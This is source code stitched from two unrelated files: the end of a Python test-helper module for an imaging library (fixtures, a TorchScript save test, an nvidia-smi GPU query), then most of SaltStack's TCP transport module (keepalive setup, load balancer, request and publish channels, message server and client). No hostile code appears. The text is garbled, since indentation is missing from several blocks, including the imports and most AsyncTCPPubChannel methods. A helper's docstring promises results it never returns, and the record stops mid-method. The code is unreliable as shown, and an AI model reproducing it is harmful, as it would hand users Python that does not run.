            num_seg_classes=self.num_classes,
        )
        # add (batch, channel) leading dims
        self.imt = im[None, None]
        self.seg1 = (msk[None, None] > 0).astype(np.float32)
        self.segn = msk[None, None]
class TorchImageTestCase3D(NumpyImageTestCase3D):
    """Same fixtures as :class:`NumpyImageTestCase3D`, converted to torch tensors."""

    def setUp(self):
        super().setUp()
        self.imt = torch.tensor(self.imt)
        self.seg1 = torch.tensor(self.seg1)
        self.segn = torch.tensor(self.segn)
def test_script_save(net, *inputs, device=None, rtol=1e-4, atol=0.0):
"""
Test the ability to save `net` as a Torchscript object, reload it, and apply inference. The value `inputs` is
forward-passed through the original and loaded copy of the network and their results returned.
The forward pass for both is done without gradient accumulation.
The test will be performed with CUDA if available, else CPU.
"""
# TODO: would be nice to use GPU if available, but it currently causes CI failures.
device = "cpu"
with tempfile.TemporaryDirectory() as tempdir:
convert_to_torchscript(
model=net,
filename_or_obj=os.path.join(tempdir, "model.ts"),
verify=True,
inputs=inputs,
device=device,
rtol=rtol,
atol=atol,
)
def download_url_or_skip_test(*args, **kwargs):
    """``download_url`` and skip the tests if any downloading error occurs."""
    # Delegate the retry/skip policy to the shared context manager.
    with skip_if_downloading_fails():
        download_url(*args, **kwargs)
def query_memory(n=2):
    """
    Find the best `n` idle devices via ``nvidia-smi`` and return a comma-separated string of device ids.
    """
    smi_cmd = "nvidia-smi --query-gpu=power.draw,temperature.gpu,memory.used --format=csv,noheader,nounits"
    try:
        proc = Popen(smi_cmd.split(), stdout=PIPE)
        output, _ = proc.communicate()
        rows = [line.split(",") for line in output.decode("utf-8").split("\n")[:-1]]
        metrics = np.asarray(rows, dtype=float).T
        metrics[1] += metrics[0]  # combine 0/1 column measures
        ids = np.lexsort(metrics)[:n]
    except (TypeError, IndexError, OSError):
        # nvidia-smi missing or its output unusable: fall back to the first n ids
        ids = range(n) if isinstance(n, int) else []
    return ",".join(f"{int(x)}" for x in ids)
# Callables that convert test data into each supported array/tensor type.
TEST_NDARRAYS: Tuple[Callable] = (np.array, torch.as_tensor)  # type: ignore
if torch.cuda.is_available():
    # also exercise GPU tensors when CUDA is present
    gpu_tensor: Callable = partial(torch.as_tensor, device="cuda")
    TEST_NDARRAYS = TEST_NDARRAYS + (gpu_tensor,)  # type: ignore

if __name__ == "__main__":
    # running this module directly prints the best idle GPU ids
    print(query_memory())
|
tcp.py
|
# -*- coding: utf-8 -*-
'''
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import msgpack
import socket
import os
import weakref
import time
import traceback
import errno
# Import Salt Libs
import salt.crypt
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.payload
import salt.exceptions
import salt.transport.frame
import salt.transport.ipc
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.exceptions import SaltReqTimeoutError, SaltClientError
from salt.transport import iter_transport_opts
# Import Tornado Libs
import tornado
import tornado.tcpserver
import tornado.gen
import tornado.concurrent
import tornado.tcpclient
import tornado.netutil
# pylint: disable=import-error,no-name-in-module
if six.PY2:
import urlparse
else:
import urllib.parse as urlparse
# pylint: enable=import-error,no-name-in-module
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if six.PY3 and salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import errno
import tornado.util
from salt.utils.process import SignalHandlingMultiprocessingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
    '''
    Ensure that TCP keepalives are set for the socket.

    All socket.* constants are probed with hasattr() because their
    availability differs per platform.
    '''
    if hasattr(socket, 'SO_KEEPALIVE'):
        if opts.get('tcp_keepalive', False):
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
            if hasattr(socket, 'SOL_TCP'):
                # Linux/BSD style tunables; each -1 default means "leave the OS default".
                if hasattr(socket, 'TCP_KEEPIDLE'):
                    tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
                    if tcp_keepalive_idle > 0:
                        sock.setsockopt(
                            socket.SOL_TCP, socket.TCP_KEEPIDLE,
                            int(tcp_keepalive_idle))
                if hasattr(socket, 'TCP_KEEPCNT'):
                    tcp_keepalive_cnt = opts.get('tcp_keepalive_cnt', -1)
                    if tcp_keepalive_cnt > 0:
                        sock.setsockopt(
                            socket.SOL_TCP, socket.TCP_KEEPCNT,
                            int(tcp_keepalive_cnt))
                if hasattr(socket, 'TCP_KEEPINTVL'):
                    tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
                    if tcp_keepalive_intvl > 0:
                        sock.setsockopt(
                            socket.SOL_TCP, socket.TCP_KEEPINTVL,
                            int(tcp_keepalive_intvl))
            if hasattr(socket, 'SIO_KEEPALIVE_VALS'):
                # Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
                # TCP_KEEPINTVL. Instead, it has its own proprietary
                # SIO_KEEPALIVE_VALS.
                tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
                tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
                # Windows doesn't support changing something equivalent to
                # TCP_KEEPCNT.
                if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
                    # Windows defaults may be found by using the link below.
                    # Search for 'KeepAliveTime' and 'KeepAliveInterval'.
                    # https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
                    # If one value is set and the other isn't, we still need
                    # to send both values to SIO_KEEPALIVE_VALS and they both
                    # need to be valid. So in that case, use the Windows
                    # default.
                    if tcp_keepalive_idle <= 0:
                        tcp_keepalive_idle = 7200
                    if tcp_keepalive_intvl <= 0:
                        tcp_keepalive_intvl = 1
                    # The values expected are in milliseconds, so multiply by
                    # 1000.
                    sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
                        1, int(tcp_keepalive_idle * 1000),
                        int(tcp_keepalive_intvl * 1000)))
        else:
            # keepalive explicitly disabled via opts
            sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
    class LoadBalancerServer(SignalHandlingMultiprocessingProcess):
        '''
        Raw TCP server which runs in its own process and will listen
        for incoming connections. Each incoming connection will be
        sent via multiprocessing queue to the workers.
        Since the queue is shared amongst workers, only one worker will
        handle a given connection.
        '''
        # TODO: opts!
        # Based on default used in tornado.netutil.bind_sockets()
        backlog = 128

        def __init__(self, opts, socket_queue, log_queue=None):
            super(LoadBalancerServer, self).__init__(log_queue=log_queue)
            self.opts = opts
            self.socket_queue = socket_queue
            self._socket = None

        # __setstate__ and __getstate__ are only used on Windows.
        # We do this so that __init__ will be invoked on Windows in the child
        # process so that a register_after_fork() equivalent will work on
        # Windows.
        def __setstate__(self, state):
            self._is_child = True
            self.__init__(
                state['opts'],
                state['socket_queue'],
                log_queue=state['log_queue']
            )

        def __getstate__(self):
            return {'opts': self.opts,
                    'socket_queue': self.socket_queue,
                    'log_queue': self.log_queue}

        def close(self):
            # Shut down and release the listening socket (idempotent).
            if self._socket is not None:
                self._socket.shutdown(socket.SHUT_RDWR)
                self._socket.close()
                self._socket = None

        def __del__(self):
            self.close()

        def run(self):
            '''
            Start the load balancer
            '''
            self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            _set_tcp_keepalive(self._socket, self.opts)
            self._socket.setblocking(1)
            self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
            self._socket.listen(self.backlog)
            while True:
                try:
                    # Wait for a connection to occur since the socket is
                    # blocking.
                    connection, address = self._socket.accept()
                    # Wait for a free slot to be available to put
                    # the connection into.
                    # Sockets are picklable on Windows in Python 3.
                    self.socket_queue.put((connection, address), True, None)
                except socket.error as e:
                    # ECONNABORTED indicates that there was a connection
                    # but it was closed while still in the accept queue.
                    # (observed on FreeBSD).
                    if tornado.util.errno_from_exception(e) == errno.ECONNABORTED:
                        continue
                    raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
    '''
    Encapsulate sending routines to tcp.

    Note: this class returns a singleton
    '''
    # This class is only a singleton per minion/master pair
    # mapping of io_loop -> {key -> channel}
    instance_map = weakref.WeakKeyDictionary()

    def __new__(cls, opts, **kwargs):
        '''
        Only create one instance of channel per __key()
        '''
        # do we have any mapping for this io_loop
        io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
        if io_loop not in cls.instance_map:
            cls.instance_map[io_loop] = weakref.WeakValueDictionary()
        loop_instance_map = cls.instance_map[io_loop]

        key = cls.__key(opts, **kwargs)
        obj = loop_instance_map.get(key)
        if obj is None:
            log.debug('Initializing new AsyncTCPReqChannel for %s', key)
            # we need to make a local variable for this, as we are going to store
            # it in a WeakValueDictionary-- which will remove the item if no one
            # references it-- this forces a reference while we return to the caller
            obj = object.__new__(cls)
            obj.__singleton_init__(opts, **kwargs)
            loop_instance_map[key] = obj
        else:
            log.debug('Re-using AsyncTCPReqChannel for %s', key)
        return obj

    @classmethod
    def __key(cls, opts, **kwargs):
        # Build the singleton key identifying a minion/master/crypt combination.
        # NOTE(review): this mutates the caller's `opts` when 'master_uri' is
        # passed as a kwarg — presumably intentional so later reads agree; confirm.
        if 'master_uri' in kwargs:
            opts['master_uri'] = kwargs['master_uri']
        return (opts['pki_dir'],     # where the keys are stored
                opts['id'],          # minion ID
                opts['master_uri'],
                kwargs.get('crypt', 'aes'),  # TODO: use the same channel for crypt
                )

    # has to remain empty for singletons, since __init__ will *always* be called
    def __init__(self, opts, **kwargs):
        pass

    # an init for the singleton instance to call
    def __singleton_init__(self, opts, **kwargs):
        self.opts = dict(opts)
        self.serial = salt.payload.Serial(self.opts)

        # crypt defaults to 'aes'
        self.crypt = kwargs.get('crypt', 'aes')

        self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()

        if self.crypt != 'clear':
            # 'clear' skips encryption entirely; otherwise negotiate AES auth
            self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)

        resolver = kwargs.get('resolver')

        parse = urlparse.urlparse(self.opts['master_uri'])
        master_host, master_port = parse.netloc.rsplit(':', 1)
        self.master_addr = (master_host, int(master_port))
        self._closing = False
        self.message_client = SaltMessageClientPool(self.opts,
                                                    args=(self.opts, master_host, int(master_port),),
                                                    kwargs={'io_loop': self.io_loop, 'resolver': resolver,
                                                            'source_ip': self.opts.get('source_ip'),
                                                            'source_port': self.opts.get('source_ret_port')})

    def close(self):
        # Idempotent shutdown of the underlying message client pool.
        if self._closing:
            return
        self._closing = True
        self.message_client.close()

    def __del__(self):
        self.close()

    def _package_load(self, load):
        # Wrap a payload with the encryption marker expected by the master.
        return {
            'enc': self.crypt,
            'load': load,
        }

    @tornado.gen.coroutine
    def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
        # Send an encrypted request and RSA-decrypt the per-reply AES key the
        # master returns, then decrypt only the requested dict entry.
        if not self.auth.authenticated:
            yield self.auth.authenticate()
        ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
        key = self.auth.get_keys()
        if HAS_M2:
            aes = key.private_decrypt(ret['key'], RSA.pkcs1_oaep_padding)
        else:
            cipher = PKCS1_OAEP.new(key)
            aes = cipher.decrypt(ret['key'])
        pcrypt = salt.crypt.Crypticle(self.opts, aes)
        data = pcrypt.loads(ret[dictkey])
        if six.PY3:
            data = salt.transport.frame.decode_embedded_strs(data)
        raise tornado.gen.Return(data)

    @tornado.gen.coroutine
    def _crypted_transfer(self, load, tries=3, timeout=60):
        '''
        In case of authentication errors, try to renegotiate authentication
        and retry the method.
        Indeed, we can fail too early in case of a master restart during a
        minion state execution call
        '''
        @tornado.gen.coroutine
        def _do_transfer():
            data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
                                                  timeout=timeout,
                                                  )
            # we may not have always data
            # as for example for saltcall ret submission, this is a blind
            # communication, we do not subscribe to return events, we just
            # upload the results to the master
            if data:
                data = self.auth.crypticle.loads(data)
                if six.PY3:
                    data = salt.transport.frame.decode_embedded_strs(data)
            raise tornado.gen.Return(data)
        if not self.auth.authenticated:
            yield self.auth.authenticate()
        try:
            ret = yield _do_transfer()
            raise tornado.gen.Return(ret)
        except salt.crypt.AuthenticationError:
            # stale session key (e.g. master restarted): re-auth once and retry
            yield self.auth.authenticate()
            ret = yield _do_transfer()
            raise tornado.gen.Return(ret)

    @tornado.gen.coroutine
    def _uncrypted_transfer(self, load, tries=3, timeout=60):
        # Plain-text path used when crypt == 'clear'.
        ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
        raise tornado.gen.Return(ret)

    @tornado.gen.coroutine
    def send(self, load, tries=3, timeout=60, raw=False):
        '''
        Send a request, return a future which will complete when we send the message
        '''
        try:
            if self.crypt == 'clear':
                ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
            else:
                ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
        except tornado.iostream.StreamClosedError:
            # Convert to 'SaltClientError' so that clients can handle this
            # exception more appropriately.
            raise SaltClientError('Connection to master lost')
        raise tornado.gen.Return(ret)
class AsyncTCPPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
    def __init__(self,
                 opts,
                 **kwargs):
        # Publish-channel setup: serializer, crypt mode, io_loop and the
        # minion event bus used to announce master (re)connections.
        self.opts = opts
        self.serial = salt.payload.Serial(self.opts)
        self.crypt = kwargs.get('crypt', 'aes')
        self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
        self.connected = False
        self._closing = False
        self._reconnected = False
        self.event = salt.utils.event.get_event(
            'minion',
            opts=self.opts,
            listen=False
        )
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
def __del__(self):
self.close()
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def send_id(self, tok, force_auth):
'''
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
'''
load = {'id': self.opts['id'], 'tok': tok}
@tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while count <= self.opts['tcp_authentication_retries'] or self.opts['tcp_authentication_retries'] < 0:
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event(
{'master': self.opts['master']},
'__master_connected'
)
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get('__role') == 'syndic':
data = 'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'syndic'
)
else:
data = 'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'minion'
)
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': None,
'tok': self.tok,
'data': data,
'tag': tag}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel, (self.opts,)
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event(
{'master': self.opts['master']},
'__master_disconnected'
)
@tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b'salt')
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts['master_ip'], int(self.auth.creds['publish_port']),),
kwargs={'io_loop': self.io_loop,
'connect_callback': self.connect_callback,
'disconnect_callback': self.disconnect_callback,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_publish_port')})
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt:
raise
except Exception as exc:
if '-|RETRY|-' not in six.text_type(exc):
raise SaltClientError('Unable to sign_in to master: {0}'.format(exc)) # TODO: better error message
def on_recv(self, callback):
'''
Register an on_recv callback
'''
if callback is None:
return self.message_client.on_recv(callback)
@tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = msgpack.loads(body)
if six.PY3:
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
    '''
    TCP request-server channel: accepts minion request connections on
    ret_port and dispatches decoded payloads to the master's payload handler.
    '''
    # TODO: opts!
    backlog = 5

    def __init__(self, opts):
        salt.transport.server.ReqServerChannel.__init__(self, opts)
        self._socket = None

    @property
    def socket(self):
        return self._socket

    def close(self):
        # Shut down and release the listening socket (idempotent).
        if self._socket is not None:
            try:
                self._socket.shutdown(socket.SHUT_RDWR)
            except socket.error as exc:
                if exc.errno == errno.ENOTCONN:
                    # We may try to shutdown a socket which is already disconnected.
                    # Ignore this condition and continue.
                    pass
                else:
                    raise exc
            self._socket.close()
            self._socket = None

    def __del__(self):
        self.close()

    def pre_fork(self, process_manager):
        '''
        Pre-fork we need to create the zmq router device
        '''
        salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
        if USE_LOAD_BALANCER:
            self.socket_queue = multiprocessing.Queue()
            process_manager.add_process(
                LoadBalancerServer, args=(self.opts, self.socket_queue)
            )
        elif not salt.utils.platform.is_windows():
            # On POSIX, bind before forking so all workers share one socket.
            self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            _set_tcp_keepalive(self._socket, self.opts)
            self._socket.setblocking(0)
            self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))

    def post_fork(self, payload_handler, io_loop):
        '''
        After forking we need to create all of the local sockets to listen to the
        router

        payload_handler: function to call with your payloads
        '''
        self.payload_handler = payload_handler
        self.io_loop = io_loop
        self.serial = salt.payload.Serial(self.opts)
        with salt.utils.asynchronous.current_ioloop(self.io_loop):
            if USE_LOAD_BALANCER:
                self.req_server = LoadBalancerWorker(self.socket_queue,
                                                     self.handle_message,
                                                     ssl_options=self.opts.get('ssl'))
            else:
                if salt.utils.platform.is_windows():
                    # Windows cannot share a bound socket across fork; bind here.
                    self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                    _set_tcp_keepalive(self._socket, self.opts)
                    self._socket.setblocking(0)
                    self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
                self.req_server = SaltMessageServer(self.handle_message,
                                                    ssl_options=self.opts.get('ssl'))
                self.req_server.add_socket(self._socket)
                self._socket.listen(self.backlog)
        salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)

    @tornado.gen.coroutine
    def handle_message(self, stream, header, payload):
        '''
        Handle incoming messages from underlying tcp streams
        '''
        try:
            try:
                payload = self._decode_payload(payload)
            except Exception:
                stream.write(salt.transport.frame.frame_msg('bad load', header=header))
                raise tornado.gen.Return()

            # TODO helper functions to normalize payload?
            if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
                yield stream.write(salt.transport.frame.frame_msg(
                    'payload and load must be a dict', header=header))
                raise tornado.gen.Return()

            try:
                id_ = payload['load'].get('id', '')
                if '\0' in id_:
                    log.error('Payload contains an id with a null byte: %s', payload)
                    # BUG FIX: tornado IOStream has no send() method -- the old
                    # stream.send(...) raised AttributeError (swallowed below)
                    # and the error never reached the minion. Use write() with
                    # a framed message like the other error branches.
                    stream.write(salt.transport.frame.frame_msg(
                        'bad load: id contains a null byte', header=header))
                    raise tornado.gen.Return()
            except TypeError:
                log.error('Payload contains non-string id: %s', payload)
                # Same fix as above: write a framed error instead of stream.send().
                stream.write(salt.transport.frame.frame_msg(
                    'bad load: id {0} is not a string'.format(id_), header=header))
                raise tornado.gen.Return()

            # intercept the "_auth" commands, since the main daemon shouldn't know
            # anything about our key auth
            if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
                yield stream.write(salt.transport.frame.frame_msg(
                    self._auth(payload['load']), header=header))
                raise tornado.gen.Return()

            # TODO: test
            try:
                ret, req_opts = yield self.payload_handler(payload)
            except Exception as e:
                # always attempt to return an error to the minion
                stream.write('Some exception handling minion payload')
                log.error('Some exception handling a payload from minion', exc_info=True)
                stream.close()
                raise tornado.gen.Return()

            # req_opts['fun'] selects how the reply is wrapped for the minion.
            req_fun = req_opts.get('fun', 'send')
            if req_fun == 'send_clear':
                stream.write(salt.transport.frame.frame_msg(ret, header=header))
            elif req_fun == 'send':
                stream.write(salt.transport.frame.frame_msg(self.crypticle.dumps(ret), header=header))
            elif req_fun == 'send_private':
                stream.write(salt.transport.frame.frame_msg(self._encrypt_private(ret,
                                                                                  req_opts['key'],
                                                                                  req_opts['tgt'],
                                                                                  ), header=header))
            else:
                log.error('Unknown req_fun %s', req_fun)
                # always attempt to return an error to the minion
                stream.write('Server-side exception handling payload')
                stream.close()
        except tornado.gen.Return:
            raise
        except tornado.iostream.StreamClosedError:
            # Stream was closed. This could happen if the remote side
            # closed the connection on its end (eg in a timeout or shutdown
            # situation).
            log.error('Connection was unexpectedly closed', exc_info=True)
        except Exception as exc:  # pylint: disable=broad-except
            # Absorb any other exceptions
            log.error('Unexpected exception occurred: %s', exc, exc_info=True)

        raise tornado.gen.Return()
class SaltMessageServer(tornado.tcpserver.TCPServer, object):
    '''
    Raw TCP server which will receive all of the TCP streams and re-assemble
    messages that are sent through to us
    '''
    def __init__(self, message_handler, *args, **kwargs):
        super(SaltMessageServer, self).__init__(*args, **kwargs)
        self.io_loop = tornado.ioloop.IOLoop.current()
        # (stream, address) pairs for every connected req client
        self.clients = []
        # Coroutine invoked as (stream, header, body) per framed message
        self.message_handler = message_handler

    def _remove_client(self, item):
        # Removal may race with other cleanup paths; tolerate a client
        # that has already been removed.
        try:
            self.clients.remove(item)
        except ValueError:
            pass

    @tornado.gen.coroutine
    def handle_stream(self, stream, address):
        '''
        Handle incoming streams and add messages to the incoming queue
        '''
        log.trace('Req client %s connected', address)
        self.clients.append((stream, address))
        unpacker = msgpack.Unpacker()
        try:
            while True:
                wire_bytes = yield stream.read_bytes(4096, partial=True)
                unpacker.feed(wire_bytes)
                for framed_msg in unpacker:
                    if six.PY3:
                        framed_msg = salt.transport.frame.decode_embedded_strs(
                            framed_msg
                        )
                    header = framed_msg['head']
                    self.io_loop.spawn_callback(self.message_handler, stream, header, framed_msg['body'])
        except tornado.iostream.StreamClosedError:
            log.trace('req client disconnected %s', address)
            self._remove_client((stream, address))
        except Exception as e:
            log.trace('other master-side exception: %s', e)
            self._remove_client((stream, address))
            stream.close()

    def shutdown(self):
        '''
        Shutdown the whole server
        '''
        # BUG FIX: iterate over a snapshot -- removing from self.clients while
        # iterating it skipped every other client.
        for item in list(self.clients):
            client, address = item
            client.close()
            self._remove_client(item)
if USE_LOAD_BALANCER:
    class LoadBalancerWorker(SaltMessageServer):
        '''
        This will receive TCP connections from 'LoadBalancerServer' via
        a multiprocessing queue.
        Since the queue is shared amongst workers, only one worker will handle
        a given connection.
        '''
        def __init__(self, socket_queue, message_handler, *args, **kwargs):
            super(LoadBalancerWorker, self).__init__(
                message_handler, *args, **kwargs)
            # Shared multiprocessing.Queue fed by LoadBalancerServer with
            # accepted (socket, address) pairs.
            self.socket_queue = socket_queue
            # Background thread blocking on the queue; each connection is
            # handed off to the IO loop for processing.
            t = threading.Thread(target=self.socket_queue_thread)
            t.start()

        def socket_queue_thread(self):
            # Runs in a plain thread (not on the IO loop); blocks forever
            # waiting for new connections from the balancer.
            try:
                while True:
                    client_socket, address = self.socket_queue.get(True, None)

                    # 'self.io_loop' initialized in super class
                    # 'tornado.tcpserver.TCPServer'.
                    # 'self._handle_connection' defined in same super class.
                    self.io_loop.spawn_callback(
                        self._handle_connection, client_socket, address)
            except (KeyboardInterrupt, SystemExit):
                pass
class TCPClientKeepAlive(tornado.tcpclient.TCPClient):
    '''
    Override _create_stream() in TCPClient to enable keep alive support.
    '''
    def __init__(self, opts, resolver=None):
        self.opts = opts
        super(TCPClientKeepAlive, self).__init__(resolver=resolver)

    def _create_stream(self, max_buffer_size, af, addr, **kwargs):  # pylint: disable=unused-argument
        '''
        Build the IOStream ourselves so the TCP keepalive options from the
        Salt config can be applied to the raw socket.

        Tornado 4.5 added the kwargs 'source_ip' and 'source_port';
        **kwargs swallows these and any future kwargs to maintain
        compatibility.
        '''
        # Always connect in plaintext; we'll convert to ssl if necessary
        # after one connection has completed.
        raw_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        _set_tcp_keepalive(raw_sock, self.opts)
        keepalive_stream = tornado.iostream.IOStream(
            raw_sock,
            max_buffer_size=max_buffer_size)
        if tornado.version_info >= (5,):
            # Tornado >= 5 expects a (stream, connect_future) pair here.
            return keepalive_stream, keepalive_stream.connect(addr)
        return keepalive_stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
    '''
    Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
    '''
    def __init__(self, opts, args=None, kwargs=None):
        super(SaltMessageClientPool, self).__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)

    def __del__(self):
        self.close()

    def close(self):
        # Close every pooled client, then drop all references to them.
        while self.message_clients:
            self.message_clients.pop().close()

    @tornado.gen.coroutine
    def connect(self):
        # Start every connect first so they proceed concurrently, then wait
        # for all of them to finish.
        connect_futures = [client.connect() for client in self.message_clients]
        for connect_future in connect_futures:
            yield connect_future
        raise tornado.gen.Return(None)

    def on_recv(self, *args, **kwargs):
        for client in self.message_clients:
            client.on_recv(*args, **kwargs)

    def send(self, *args, **kwargs):
        # Route the message through the client with the shortest backlog.
        ranked = sorted(self.message_clients, key=lambda client: len(client.send_queue))
        return ranked[0].send(*args, **kwargs)

    def write_to_stream(self, *args, **kwargs):
        # Raw stream write on the least-loaded client (bypasses framing/ids).
        ranked = sorted(self.message_clients, key=lambda client: len(client.send_queue))
        return ranked[0]._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient(object):
    '''
    Low-level message sending client
    '''
    def __init__(self, opts, host, port, io_loop=None, resolver=None,
                 connect_callback=None, disconnect_callback=None,
                 source_ip=None, source_port=None):
        self.opts = opts
        self.host = host
        self.port = port
        # Optional local bind address/port for the outgoing connection
        self.source_ip = source_ip
        self.source_port = source_port
        # Called with the connect result on every (re)connect
        self.connect_callback = connect_callback
        # Called (no args) whenever the stream drops
        self.disconnect_callback = disconnect_callback
        self.io_loop = io_loop or tornado.ioloop.IOLoop.current()
        with salt.utils.asynchronous.current_ioloop(self.io_loop):
            self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
        # Message ids multiplex request/reply pairs on the single stream.
        self._mid = 1
        self._max_messages = int((1 << 31) - 2)  # number of IDs before we wrap
        # TODO: max queue size
        self.send_queue = []  # queue of messages to be sent
        self.send_future_map = {}  # mapping of request_id -> Future
        self.send_timeout_map = {}  # request_id -> timeout_callback

        self._read_until_future = None
        self._on_recv = None
        self._closing = False
        self._connecting_future = self.connect()
        self._stream_return_future = tornado.concurrent.Future()
        self.io_loop.spawn_callback(self._stream_return)

    # TODO: timeout inflight sessions
    def close(self):
        # Idempotent teardown: close the stream, drain the reader coroutine,
        # then release callback references.
        if self._closing:
            return
        self._closing = True
        if hasattr(self, '_stream') and not self._stream.closed():
            # If _stream_return() hasn't completed, it means the IO
            # Loop is stopped (such as when using
            # 'salt.utils.asynchronous.SyncWrapper'). Ensure that
            # _stream_return() completes by restarting the IO Loop.
            # This will prevent potential errors on shutdown.
            try:
                orig_loop = tornado.ioloop.IOLoop.current()
                self.io_loop.make_current()
                self._stream.close()
                if self._read_until_future is not None:
                    # This will prevent this message from showing up:
                    # '[ERROR   ] Future exception was never retrieved:
                    # StreamClosedError'
                    # This happens because the logic is always waiting to read
                    # the next message and the associated read future is marked
                    # 'StreamClosedError' when the stream is closed.
                    self._read_until_future.exception()
                    if (not self._stream_return_future.done() and
                            self.io_loop != tornado.ioloop.IOLoop.current(
                                instance=False)):
                        self.io_loop.add_future(
                            self._stream_return_future,
                            lambda future: self.io_loop.stop()
                        )
                        self.io_loop.start()
            finally:
                orig_loop.make_current()
        self._tcp_client.close()
        # Clear callback references to allow the object that they belong to
        # to be deleted.
        self.connect_callback = None
